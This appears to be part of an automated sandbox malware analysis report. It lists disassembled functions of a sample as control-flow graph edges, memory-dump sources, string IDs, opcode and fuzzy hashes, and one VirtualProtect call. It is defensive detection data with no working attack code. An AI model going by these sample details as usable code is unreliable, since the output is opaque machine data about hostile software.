7ffd34694108-7ffd3469410b 868->874 869->859 875 7ffd346940c6 869->875 878 7ffd346941f7-7ffd34694200 870->878 879 7ffd34694187-7ffd3469418a 870->879 876 7ffd34694203 871->876 880 7ffd3469420c-7ffd34694212 872->880 881 7ffd3469418c 872->881 873->877 882 7ffd34694152 873->882 874->879 883 7ffd3469410c 874->883 875->883 884 7ffd346940c8-7ffd346940cb 875->884 885 7ffd34694239 876->885 886 7ffd34694204-7ffd34694205 876->886 887 7ffd34694248 877->887 888 7ffd346941cd 877->888 878->871 879->872 889 7ffd34694206-7ffd3469420a 879->889 901 7ffd34694213-7ffd34694218 880->901 890 7ffd3469418d-7ffd34694192 881->890 891 7ffd346941d2 881->891 892 7ffd34694198 882->892 893 7ffd34694153-7ffd3469416a 882->893 883->890 894 7ffd3469410d 883->894 884->822 896 7ffd3469423b-7ffd3469423c 885->896 886->889 897 7ffd3469424a 887->897 899 7ffd3469423e-7ffd34694246 888->899 900 7ffd346941ce-7ffd346941d1 888->900 889->880 890->876 902 7ffd34694194-7ffd34694197 890->902 907 7ffd34694253-7ffd34694257 891->907 908 7ffd346941d3 891->908 903 7ffd34694219-7ffd34694222 892->903 904 7ffd34694199 892->904 893->848 894->893 905 7ffd3469410e-7ffd34694123 894->905 896->899 906 7ffd3469424d-7ffd34694252 897->906 900->891 900->906 901->903 902->892 902->901 903->896 909 7ffd34694224-7ffd34694225 903->909 910 7ffd3469419a-7ffd346941b5 904->910 911 7ffd346941df-7ffd346941e0 904->911 905->837 906->907 918 7ffd3469425a-7ffd34694297 907->918 908->903 913 7ffd346941d4-7ffd346941d9 908->913 916 7ffd34694226-7ffd34694231 909->916 910->857 911->916 921 7ffd346941e1-7ffd346941f6 911->921 913->897 915 7ffd346941db-7ffd346941de 913->915 915->911 915->918 916->896 923 7ffd34694233-7ffd34694238 916->923 922 7ffd34694298-7ffd346942b4 call 7ffd34680288 918->922 921->878 928 7ffd346942b6-7ffd346942c4 call 7ffd34688400 922->928 923->885 931 7ffd346942c9-7ffd346942e9 928->931 932 7ffd346942ef-7ffd34694347 call 7ffd34688430 931->932 933 7ffd34694403-7ffd34694454 call 7ffd346802e8 call 7ffd34688428 931->933 940 7ffd3469434c-7ffd3469435d 932->940 944 7ffd34694459-7ffd3469446c 933->944 940->931
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (rs4$(rs4
                                              • API String ID: 0-1344946526
                                              • Opcode ID: 750055f91f47fb0fd65b6b51377ef65aa0daf1ef60b97f02b522a0ca5dae3e07
                                              • Instruction ID: 6a6e24a7946560ac324e9236be56bf1034396070511f87d251769b3f6dcb9faa
                                              • Opcode Fuzzy Hash: 750055f91f47fb0fd65b6b51377ef65aa0daf1ef60b97f02b522a0ca5dae3e07
                                              • Instruction Fuzzy Hash: 65024B31B0CA594FE3ACDF1C84A65F437D1FF9A310B1402BED54ECB6A2DA5CA8069381
                                              Function 00007FFD346844FC Relevance: 3.0, Strings: 2, Instructions: 455COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: fish$x$q4
                                              • API String ID: 0-2381136664
                                              • Opcode ID: 834889767fba32f009861e73d96d69342a9904fbb2ade37beff3e0910480dbfc
                                              • Instruction ID: 57cb3f82a9101f9f8e2c4a36b45ac40d4233c47fec1f210676cbe3df10c2d1a5
                                              • Opcode Fuzzy Hash: 834889767fba32f009861e73d96d69342a9904fbb2ade37beff3e0910480dbfc
                                              • Instruction Fuzzy Hash: C5D12930B1CB5A4FE79CAB2888A55F577E1FF96300B04417ED58BC3292EE28EC429741
                                              Function 00007FFD3468CA60 Relevance: 2.2, Strings: 1, Instructions: 919COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1090 7ffd3468ca60-7ffd3468ca7a 1092 7ffd3468ca7c-7ffd3468caa7 1090->1092 1093 7ffd3468cac4-7ffd3468cb06 call 7ffd3468b4a0 * 2 call 7ffd346873a0 1090->1093 1094 7ffd3468caad-7ffd3468cac3 1092->1094 1095 7ffd3468cc3e-7ffd3468cc93 1092->1095 1093->1095 1108 7ffd3468cb0c-7ffd3468cb2a 1093->1108 1094->1093 1104 7ffd3468cd66-7ffd3468cd71 1095->1104 1105 7ffd3468cc99-7ffd3468ccee call 7ffd3468b4a0 * 2 call 7ffd346873a0 1095->1105 1112 7ffd3468cd76-7ffd3468cdbb 1104->1112 1113 7ffd3468cd73-7ffd3468cd75 1104->1113 1105->1104 1139 7ffd3468ccf0-7ffd3468cd1b 1105->1139 1108->1095 1111 7ffd3468cb30-7ffd3468cb4a 1108->1111 1115 7ffd3468cb4c-7ffd3468cb4f 1111->1115 1116 7ffd3468cba3 1111->1116 1125 7ffd3468ce45-7ffd3468ce57 1112->1125 1126 7ffd3468cdc1-7ffd3468ce01 call 7ffd3468b4a0 call 7ffd346873a0 1112->1126 1113->1112 1121 7ffd3468cbd0-7ffd3468cc12 call 7ffd3468be70 1115->1121 1122 7ffd3468cb51-7ffd3468cb6a 1115->1122 1118 7ffd3468cba5-7ffd3468cbaa 1116->1118 1119 7ffd3468cc14 1116->1119 1127 7ffd3468cc2b-7ffd3468cc3d 1118->1127 1128 7ffd3468cbac-7ffd3468cbcb call 7ffd34687740 1118->1128 1119->1095 1131 7ffd3468cc16-7ffd3468cc29 1119->1131 1121->1119 1123 7ffd3468cb85-7ffd3468cb97 1122->1123 1124 7ffd3468cb6c-7ffd3468cb83 1122->1124 1132 7ffd3468cb9b-7ffd3468cba1 1123->1132 1124->1132 1141 7ffd3468ce99-7ffd3468ce9e 1125->1141 1142 7ffd3468ce59-7ffd3468ce6a 1125->1142 1126->1125 1152 7ffd3468ce03-7ffd3468ce44 call 7ffd34688a90 1126->1152 1128->1121 1131->1127 1132->1116 1144 7ffd3468cd5a-7ffd3468cd65 1139->1144 1145 7ffd3468cd1d-7ffd3468cd2f 1139->1145 1147 7ffd3468cea0-7ffd3468cf0e call 7ffd34688330 1141->1147 1146 7ffd3468ce6c-7ffd3468ce97 1142->1146 1142->1147 1145->1104 1149 7ffd3468cd31-7ffd3468cd57 1145->1149 1146->1141 1163 7ffd3468d009-7ffd3468d013 1147->1163 1149->1144 1164 7ffd3468d019-7ffd3468d01f 1163->1164 1165 7ffd3468cf13-7ffd3468cf1e 1163->1165 1166 7ffd3468d020-7ffd3468d05a 1165->1166 1167 7ffd3468cf24-7ffd3468cf6d 1165->1167 1172 7ffd3468d05c-7ffd3468d067 1166->1172 1173 7ffd3468d090-7ffd3468d0ba 1166->1173 1177 7ffd3468cf8a-7ffd3468cf8c 1167->1177 1178 7ffd3468cf6f-7ffd3468cf88 1167->1178 1180 7ffd3468d0bc-7ffd3468d0e3 1173->1180 1181 7ffd3468d0f0-7ffd3468d0fa 1173->1181 1182 7ffd3468cf8f-7ffd3468cf9c 1177->1182 1178->1182 1189 7ffd3468d130-7ffd3468d167 1180->1189 1193 7ffd3468d0e5-7ffd3468d0e7 1180->1193 1188 7ffd3468d0fc-7ffd3468d127 1181->1188 1181->1189 1186 7ffd3468cf9e-7ffd3468cffc call 7ffd34689c40 1182->1186 1187 7ffd3468d001-7ffd3468d006 1182->1187 1186->1187 1187->1163
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0Bs4
                                              • API String ID: 0-2279055507
                                              • Opcode ID: 9a237f526d71a08f72e90e6d316155c2b90d24bfac59d782538576cebfb427b0
                                              • Instruction ID: a0416e68e1fd1da43a58d261694bcf136cbb36a0c9ac231ec1dd65d8e4e1e810
                                              • Opcode Fuzzy Hash: 9a237f526d71a08f72e90e6d316155c2b90d24bfac59d782538576cebfb427b0
                                              • Instruction Fuzzy Hash: 2C52B231A0DB994FE786DF2888A45A47FF1EF57300B0941FBD189CB2A3DA2CA845D751
                                              Function 00007FFD34681048 Relevance: 2.0, Strings: 1, Instructions: 751COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1202 7ffd34681048-7ffd34682650 1204 7ffd34682652-7ffd34682657 call 7ffd34681040 1202->1204 1205 7ffd3468265c-7ffd34682693 1202->1205 1204->1205 1209 7ffd34682884-7ffd34682899 1205->1209 1210 7ffd34682699-7ffd346826a4 1205->1210 1218 7ffd346828a3-7ffd346828ee 1209->1218 1219 7ffd3468289b-7ffd346828a2 1209->1219 1211 7ffd34682712-7ffd34682717 1210->1211 1212 7ffd346826a6-7ffd346826ae 1210->1212 1213 7ffd34682783-7ffd3468278d 1211->1213 1214 7ffd34682719-7ffd34682725 1211->1214 1212->1209 1216 7ffd346826b4-7ffd346826c9 1212->1216 1220 7ffd346827af-7ffd346827b7 1213->1220 1221 7ffd3468278f-7ffd3468279c call 7ffd34681060 1213->1221 1214->1209 1217 7ffd3468272b-7ffd3468273e 1214->1217 1222 7ffd346826f2-7ffd346826fd 1216->1222 1223 7ffd346826cb-7ffd346826f0 1216->1223 1224 7ffd346827ba-7ffd346827c5 1217->1224 1241 7ffd346828f0-7ffd346828f6 1218->1241 1242 7ffd3468290b-7ffd3468291c 1218->1242 1219->1218 1220->1224 1239 7ffd346827a1-7ffd346827ad 1221->1239 1222->1209 1227 7ffd34682703-7ffd34682710 1222->1227 1223->1222 1231 7ffd34682740-7ffd34682743 1223->1231 1224->1209 1228 7ffd346827cb-7ffd346827e6 1224->1228 1227->1211 1227->1212 1228->1209 1232 7ffd346827ec-7ffd346827ff 1228->1232 1233 7ffd3468274f-7ffd34682757 1231->1233 1234 7ffd34682745 1231->1234 1232->1209 1237 7ffd34682805-7ffd34682816 1232->1237 1233->1209 1238 7ffd3468275d-7ffd34682782 1233->1238 1234->1233 1237->1209 1249 7ffd34682818-7ffd34682827 1237->1249 1239->1220 1245 7ffd34682951-7ffd346829ca 1241->1245 1246 7ffd346828f8-7ffd34682909 1241->1246 1247 7ffd3468291e-7ffd3468292c 1242->1247 1248 7ffd3468292d-7ffd34682950 1242->1248 1263 7ffd346829de-7ffd346829ef 1245->1263 1264 7ffd346829cc-7ffd346829dc 1245->1264 1246->1241 1246->1242 1247->1248 1251 7ffd34682872-7ffd34682883 1249->1251 1252 7ffd34682829-7ffd34682834 1249->1252 1252->1251 1259 7ffd34682836-7ffd3468284d 1252->1259 1266 7ffd346829f1-7ffd346829ff 1263->1266 1267 7ffd34682a00-7ffd34682a31 1263->1267 1264->1263 1264->1264 1266->1267 1271 7ffd34682a33-7ffd34682a39 1267->1271 1272 7ffd34682a87-7ffd34682a8e 1267->1272 1271->1272 1275 7ffd34682a3b-7ffd34682a3c 1271->1275 1273 7ffd34682a90-7ffd34682a91 1272->1273 1274 7ffd34682acf-7ffd34682af8 1272->1274 1276 7ffd34682a94-7ffd34682a97 1273->1276 1277 7ffd34682a3f-7ffd34682a42 1275->1277 1278 7ffd34682af9-7ffd34682b2a 1276->1278 1279 7ffd34682a99-7ffd34682aaa 1276->1279 1277->1278 1281 7ffd34682a48-7ffd34682a58 1277->1281 1290 7ffd34682b60-7ffd34682b7b 1278->1290 1291 7ffd34682b2c-7ffd34682b44 1278->1291 1282 7ffd34682aac-7ffd34682ab2 1279->1282 1283 7ffd34682ac6-7ffd34682acd 1279->1283 1284 7ffd34682a80-7ffd34682a85 1281->1284 1285 7ffd34682a5a-7ffd34682a7c 1281->1285 1282->1278 1286 7ffd34682ab4-7ffd34682ac2 1282->1286 1283->1274 1283->1276 1284->1272 1284->1277 1285->1284 1286->1283 1292 7ffd34682b81-7ffd34682b8b 1290->1292 1293 7ffd34682bfd-7ffd34682c11 1290->1293 1295 7ffd34682be0-7ffd34682bef 1291->1295 1297 7ffd34682b4a-7ffd34682b5d 1291->1297 1292->1295 1296 7ffd34682b8d-7ffd34682b94 1292->1296 1303 7ffd34682c13 1293->1303 1304 7ffd34682c15-7ffd34682c19 1293->1304 1296->1293 1298 7ffd34682b96-7ffd34682ba5 1296->1298 1297->1290 1301 7ffd34682bce-7ffd34682bd5 1298->1301 1302 7ffd34682ba7-7ffd34682bcc 1298->1302 1301->1293 1306 7ffd34682bd7-7ffd34682bde 1301->1306 1302->1301 1312 7ffd34682bf0-7ffd34682bfc 1302->1312 1303->1304 1307 7ffd34682c55-7ffd34682c71 1303->1307 1308 7ffd34682c50 1304->1308 1309 7ffd34682c1c-7ffd34682c3e 1304->1309 1306->1295 1306->1296 1308->1307 1309->1308
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d
                                              • API String ID: 0-2564639436
                                              • Opcode ID: cee156e573884a12719e2dac8ddd26d348ca65bde35be749a1c6a5c1a98fcd42
                                              • Instruction ID: 4b083605870220e1d44325ccd1527917b63105b77d23c4f802c36bfb8683f8fb
                                              • Opcode Fuzzy Hash: cee156e573884a12719e2dac8ddd26d348ca65bde35be749a1c6a5c1a98fcd42
                                              • Instruction Fuzzy Hash: 4F223171B0CB5A4FE7A9DF28D8A15B177E0EF52314B1442BAC19BC3197DA29F8438780
                                              Function 00007FFD34760003 Relevance: 2.0, Strings: 1, Instructions: 725COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1315 7ffd34760003-7ffd34760022 1316 7ffd34760024-7ffd34760054 1315->1316 1317 7ffd34760058-7ffd34760072 1315->1317 1316->1317 1323 7ffd34760074-7ffd3476009c 1317->1323 1324 7ffd347600a8-7ffd347600af 1317->1324 1328 7ffd347600b0-7ffd347600b6 1323->1328 1332 7ffd3476009e-7ffd347600a7 1323->1332 1324->1328 1330 7ffd347600b8-7ffd347600c6 1328->1330 1331 7ffd347600c7-7ffd347600fa 1328->1331 1334 7ffd34760130-7ffd3476014c 1331->1334 1335 7ffd347600fc-7ffd3476012f 1331->1335 1332->1324 1339 7ffd3476014e-7ffd3476015d 1334->1339 1340 7ffd34760160-7ffd34760168 1334->1340 1335->1334 1339->1340 1343 7ffd3476016a-7ffd3476016b 1340->1343 1344 7ffd34760179-7ffd347601a8 1340->1344 1345 7ffd3476016d-7ffd34760178 1343->1345 1344->1345 1347 7ffd347601aa-7ffd347601bc 1344->1347 1350 7ffd347601be 1347->1350 1351 7ffd347601bf-7ffd34760222 1347->1351 1350->1351 1355 7ffd347603b1-7ffd347603b7 1351->1355 1356 7ffd34760228-7ffd3476023b 1351->1356 1360 7ffd347603b9-7ffd347603c8 1355->1360 1356->1355 1357 7ffd34760241-7ffd34760258 1356->1357 1359 7ffd3476025a-7ffd3476026d 1357->1359 1359->1355 1361 7ffd34760273-7ffd3476027c 1359->1361 1362 7ffd347603c9-7ffd34760427 1360->1362 1364 7ffd34760284-7ffd34760286 1361->1364 1375 7ffd34760429-7ffd34760440 1362->1375 1376 7ffd3476045c-7ffd34760474 1362->1376 1366 7ffd34760288-7ffd34760289 1364->1366 1367 7ffd347602f7-7ffd34760309 1364->1367 1370 7ffd3476024f-7ffd34760258 1366->1370 1371 7ffd3476028b-7ffd3476028d 1366->1371 1367->1355 1368 7ffd3476030f-7ffd34760348 1367->1368 1368->1360 1387 7ffd3476034a-7ffd3476034d 1368->1387 1370->1359 1377 7ffd347602d4 1371->1377 1378 7ffd3476028f-7ffd347602b8 1371->1378 1380 7ffd34760442-7ffd34760445 1375->1380 1381 7ffd347604b1-7ffd347604b8 1375->1381 1377->1355 1384 7ffd347602da-7ffd347602f5 1377->1384 1378->1355 1393 7ffd347602be-7ffd347602d1 1378->1393 1385 7ffd347604c6-7ffd347604d0 1380->1385 1388 7ffd34760447-7ffd3476045a 1380->1388 1381->1385 1384->1367 1390 7ffd347604d1-7ffd347604da 1385->1390 1387->1362 1391 7ffd3476034f 1387->1391 1388->1376 1388->1390 1397 7ffd34760510-7ffd34760534 1390->1397 1398 7ffd347604dc-7ffd34760500 1390->1398 1395 7ffd34760351-7ffd3476035f 1391->1395 1396 7ffd34760396-7ffd347603b0 1391->1396 1393->1377 1405 7ffd34760502-7ffd34760505 1398->1405 1406 7ffd34760571-7ffd34760578 1398->1406 1407 7ffd34760586-7ffd34760590 1405->1407 1408 7ffd34760507-7ffd3476050f 1405->1408 1406->1407 1409 7ffd34760592 1407->1409 1410 7ffd34760597-7ffd3476059a 1407->1410 1408->1397 1413 7ffd34760594-7ffd34760595 1409->1413 1414 7ffd347605c8-7ffd347605cf 1409->1414 1411 7ffd347605d0-7ffd347605f4 1410->1411 1412 7ffd3476059c-7ffd347605c0 1410->1412 1419 7ffd347605c2-7ffd347605c5 1412->1419 1420 7ffd34760631-7ffd34760639 1412->1420 1413->1410 1414->1411 1422 7ffd34760646-7ffd3476065a 1419->1422 1423 7ffd347605c7 1419->1423 1420->1422 1427 7ffd34760690-7ffd347606c7 1422->1427 1428 7ffd3476065c-7ffd3476067a 1422->1428 1423->1414 1434 7ffd3476067c-7ffd3476067e 1428->1434 1435 7ffd347606eb-7ffd347606f9 1428->1435 1438 7ffd34760680-7ffd3476068f 1434->1438 1439 7ffd347606fa-7ffd34760708 1434->1439 1435->1439 1438->1427
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2461131384.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34760000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: A
                                              • API String ID: 0-3554254475
                                              • Opcode ID: d4a2e250867127cf1008fed6f9283142df142fdf835ccb8936a4b3dc4ce3f409
                                              • Instruction ID: 330800135f36ee99c023ee2f3215427cdfcf4699a21926b1fe421ed80fc6198a
                                              • Opcode Fuzzy Hash: d4a2e250867127cf1008fed6f9283142df142fdf835ccb8936a4b3dc4ce3f409
                                              • Instruction Fuzzy Hash: 1D32E5B290E7C68FE756CB2888A55A47FE1EF53320B0905FBD189CB193DA1C7806D791
                                              Function 00007FFD34681CC0 Relevance: 1.9, Strings: 1, Instructions: 686COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1441 7ffd34681cc0-7ffd346849d1 call 7ffd34684890 1448 7ffd346849f4-7ffd34684a03 1441->1448 1449 7ffd346849d3-7ffd346849e9 call 7ffd34684890 call 7ffd346848e0 1448->1449 1450 7ffd34684a05-7ffd34684a1f call 7ffd34684890 call 7ffd346848e0 1448->1450 1459 7ffd34684a20-7ffd34684a4a 1449->1459 1460 7ffd346849eb-7ffd346849f2 1449->1460 1463 7ffd34684a80-7ffd34684ab3 1459->1463 1464 7ffd34684a4c-7ffd34684a70 1459->1464 1460->1448 1467 7ffd34684caf-7ffd34684d19 1463->1467 1468 7ffd34684ab9-7ffd34684ac4 1463->1468 1469 7ffd34684a72-7ffd34684a77 call 7ffd34684108 1464->1469 1470 7ffd34684a7c-7ffd34684a7d 1464->1470 1504 7ffd34684d1a 1467->1504 1505 7ffd34684d36-7ffd34684d60 1467->1505 1471 7ffd34684b38-7ffd34684b3d 1468->1471 1472 7ffd34684ac6-7ffd34684ad4 1468->1472 1469->1470 1470->1463 1475 7ffd34684bb0-7ffd34684bba 1471->1475 1476 7ffd34684b3f-7ffd34684b4b 1471->1476 1472->1467 1474 7ffd34684ada-7ffd34684ae9 1472->1474 1478 7ffd34684b1d-7ffd34684b28 1474->1478 1479 7ffd34684aeb-7ffd34684b1b 1474->1479 1480 7ffd34684bdc-7ffd34684be4 1475->1480 1481 7ffd34684bbc-7ffd34684bc9 call 7ffd34684128 1475->1481 1476->1467 1482 7ffd34684b51-7ffd34684b64 1476->1482 1478->1467 1485 7ffd34684b2e-7ffd34684b36 1478->1485 1479->1478 1487 7ffd34684b69-7ffd34684b6c 1479->1487 1486 7ffd34684be7-7ffd34684bf2 1480->1486 1496 7ffd34684bce-7ffd34684bda 1481->1496 1482->1486 1485->1471 1485->1472 1486->1467 1489 7ffd34684bf8-7ffd34684c08 1486->1489 1492 7ffd34684b82-7ffd34684b8a 1487->1492 1493 7ffd34684b6e-7ffd34684b7e 1487->1493 1489->1467 1494 7ffd34684c0e-7ffd34684c1b 1489->1494 1492->1467 1498 7ffd34684b90-7ffd34684baf 1492->1498 1493->1492 1494->1467 1497 7ffd34684c21-7ffd34684c41 1494->1497 1496->1480 1497->1467 1506 7ffd34684c43-7ffd34684c52 1497->1506 1509 7ffd34684d1b-7ffd34684d21 1504->1509 1507 7ffd34684c54-7ffd34684c5f 1506->1507 1508 7ffd34684c9d-7ffd34684cae 1506->1508 1507->1508 1515 7ffd34684c61-7ffd34684c98 call 7ffd34684128 1507->1515 1511 7ffd34684d23-7ffd34684d34 1509->1511 1512 7ffd34684d61-7ffd34684d7a 1509->1512 1511->1505 1511->1509 1519 7ffd34684db0 1512->1519 1520 7ffd34684d7c-7ffd34684d7d 1512->1520 1515->1508 1521 7ffd34684db2-7ffd34684db5 1519->1521 1522 7ffd34684dba-7ffd34684dc7 1519->1522 1524 7ffd34684d7f-7ffd34684da5 1520->1524 1526 7ffd34684dc9-7ffd34684e01 1521->1526 1527 7ffd34684db7-7ffd34684db8 1521->1527 1522->1526 1522->1527 1528 7ffd34684da7-7ffd34684daf 1524->1528 1533 7ffd34684e03-7ffd34684e09 1526->1533 1534 7ffd34684e58-7ffd34684e5f 1526->1534 1527->1522 1528->1519 1533->1534 1537 7ffd34684e0b-7ffd34684e0c 1533->1537 1535 7ffd34684ea2-7ffd34684ecb 1534->1535 1536 7ffd34684e61-7ffd34684e62 1534->1536 1538 7ffd34684e65-7ffd34684e68 1536->1538 1539 7ffd34684e0f-7ffd34684e12 1537->1539 1540 7ffd34684ecc-7ffd34684ee1 1538->1540 1541 7ffd34684e6a-7ffd34684e7b 1538->1541 1539->1540 1543 7ffd34684e18-7ffd34684e25 1539->1543 1552 7ffd34684ee3-7ffd34684eea 1540->1552 1553 7ffd34684eeb-7ffd34684f16 1540->1553 1544 7ffd34684e7d-7ffd34684e83 1541->1544 1545 7ffd34684e99-7ffd34684ea0 1541->1545 1546 7ffd34684e51-7ffd34684e56 1543->1546 1547 7ffd34684e27-7ffd34684e4e 1543->1547 1544->1540 1548 7ffd34684e85-7ffd34684e95 1544->1548 1545->1535 1545->1538 1546->1534 1546->1539 1547->1546 1548->1545 1552->1553
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d
                                              • API String ID: 0-2564639436
                                              • Opcode ID: 91dcfa450e3c158352e773d0ac9323213695bddad5be7e4274708c42db438bd1
                                              • Instruction ID: 07a54f2ad488cd7e6e37d58eddf010fc2c9067c110e6c897e5c9ff6da9cf74c3
                                              • Opcode Fuzzy Hash: 91dcfa450e3c158352e773d0ac9323213695bddad5be7e4274708c42db438bd1
                                              • Instruction Fuzzy Hash: 6A124431B0CA494FE799DF2894E15B177E0EF92314B1442BAD58EC7197EE28F8428780
                                              Function 00007FFD346850B0 Relevance: 1.8, Instructions: 1762COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c3c47b210162f459ad51f171bdd37699569913bb027cbf909414043ebe0bfe99
                                              • Instruction ID: 17dcf09fada546f52e43244b49eb1a701d0d36cfcb60065fd3e5a2474265e7da
                                              • Opcode Fuzzy Hash: c3c47b210162f459ad51f171bdd37699569913bb027cbf909414043ebe0bfe99
                                              • Instruction Fuzzy Hash: 4EC25431A0CAA64FE769CF2488A11F577E1FF92310F1441BED58ECB593DA6CA846D780
                                              Function 00007FFD346908EA Relevance: 1.1, Instructions: 1106COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 66d472424de741cfccbd20bf2ba6c2d5d34ee9190f8165b9d273eea7bcbb2929
                                              • Instruction ID: cad2b93238bdd7515ad79ccafb16b896ebe7cb85abd01aaf26991d72ae4b517c
                                              • Opcode Fuzzy Hash: 66d472424de741cfccbd20bf2ba6c2d5d34ee9190f8165b9d273eea7bcbb2929
                                              • Instruction Fuzzy Hash: 0472563160CB6A4FE399DF28C4A15F577E1FF96300B1046BED58AC7296DE28E846C781
                                              Function 00007FFD34689820 Relevance: .9, Instructions: 873COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 100453dd443fef79ac973b7ad7db3df8e99593a991cb512be9c8b306694d0267
                                              • Instruction ID: 3668a554ce7f9d2b6267f40b891224f91bb2d18bc421b0d20daeff41fe47251f
                                              • Opcode Fuzzy Hash: 100453dd443fef79ac973b7ad7db3df8e99593a991cb512be9c8b306694d0267
                                              • Instruction Fuzzy Hash: 2342C671B08A194FDBA8DF28D4A56B977E1FF59301F1401BEE08EC7293DE28AC429751
                                              Function 00007FFD3468BF39 Relevance: .5, Instructions: 536COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3139e50746c09d869d59be10ae5df27f364b41ea70092ea17b2b4f245f23ab0d
                                              • Instruction ID: 0dd6c96da7afd9bd3f8f8183c7ea27df6e54d3981fe739573040f8b29323547e
                                              • Opcode Fuzzy Hash: 3139e50746c09d869d59be10ae5df27f364b41ea70092ea17b2b4f245f23ab0d
                                              • Instruction Fuzzy Hash: ECF15A31A0CBA64FE399CF2888E15B577D2FF92301B14467ED5CAC72A2DD2CA442D781
                                              Function 00007FFD34694F38 Relevance: .2, Instructions: 196COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 463156bdc64818db080c3fe878d5014f6d2e42172e59eab6bee82d981fd7647c
                                              • Instruction ID: 2e44ca99c603217a9ec704a753583574721d87a30c901210c6eee54fe83f0e75
                                              • Opcode Fuzzy Hash: 463156bdc64818db080c3fe878d5014f6d2e42172e59eab6bee82d981fd7647c
                                              • Instruction Fuzzy Hash: 81516832B0C75A0FE76D9E7888651B57BE1EB83310B05827FD08BC7697DD28A8468391
                                              Function 00007FFD3468350A Relevance: 1.6, APIs: 1, Instructions: 136memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2209 7ffd3468350a-7ffd34683517 2210 7ffd34683522-7ffd34683533 2209->2210 2211 7ffd34683519-7ffd34683521 2209->2211 2212 7ffd3468353e-7ffd346835ef VirtualProtect 2210->2212 2213 7ffd34683535-7ffd3468353d 2210->2213 2211->2210 2217 7ffd346835f1 2212->2217 2218 7ffd346835f7-7ffd3468361f 2212->2218 2213->2212 2217->2218
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2460457922.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffd34680000_SecuriteInfo.jbxd
                                              Similarity
